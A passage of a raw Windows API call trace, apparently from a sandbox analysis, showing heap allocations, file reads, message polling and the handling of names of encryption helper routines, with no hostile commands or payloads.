dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0038.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0038.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0038.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0038.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.439] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0038.440] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.440] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0038.440] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0038.441] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0038.441] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0038.443] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x944, lpOverlapped=0x0) returned 1 [0038.443] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0038.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10944) returned 0xac0018 [0038.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0038.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0038.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10944) returned 0xad0968 [0038.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.445] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10944) returned 0xac0018 [0038.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0038.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.446] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0038.446] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.446] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0038.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10944) returned 0xac0018 [0038.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0038.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0038.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0038.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0038.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a90 [0038.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0038.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0038.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0038.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10944) returned 0x935008 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.449] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.449] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0038.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.450] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0038.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da208 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0038.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc10 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.450] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0038.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0038.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0038.451] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0038.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0038.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0038.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0038.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0038.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0038.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0038.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.451] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0038.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0038.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0038.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0038.452] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0038.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0038.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0038.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.453] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.453] HeapFree (in: hHeap=0x770000, 